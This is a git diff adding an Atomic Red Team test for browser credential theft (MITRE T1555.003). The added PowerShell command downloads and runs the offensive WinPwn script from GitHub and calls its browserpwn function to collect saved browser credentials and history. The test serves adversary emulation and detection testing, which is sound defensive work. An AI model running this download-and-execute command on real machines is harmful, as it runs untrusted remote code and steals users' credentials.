diff --git a/atomics/T1555.003/T1555.003.yaml b/atomics/T1555.003/T1555.003.yaml index ea586e01..6f99f15a 100644 --- a/atomics/T1555.003/T1555.003.yaml +++ b/atomics/T1555.003/T1555.003.yaml @@ -336,3 +336,15 @@ atomic_tests: cleanup_command: | Remove-Item -Path "$env:temp\T1555.003.zip" -force -erroraction silentlycontinue Remove-Item -Path "$env:temp\T1555.003\" -force -recurse -erroraction silentlycontinue +- name: WinPwn - BrowserPwn + description: Collect Browser credentials as well as the history via winpwn browserpwn function of WinPwn. + supported_platforms: + - windows + executor: + command: |- + $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' + iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') + browserpwn -consoleoutput -noninteractive + cleanup_command: |- + rm .\System.Data.SQLite.dll -ErrorAction Ignore + name: powershell \ No newline at end of file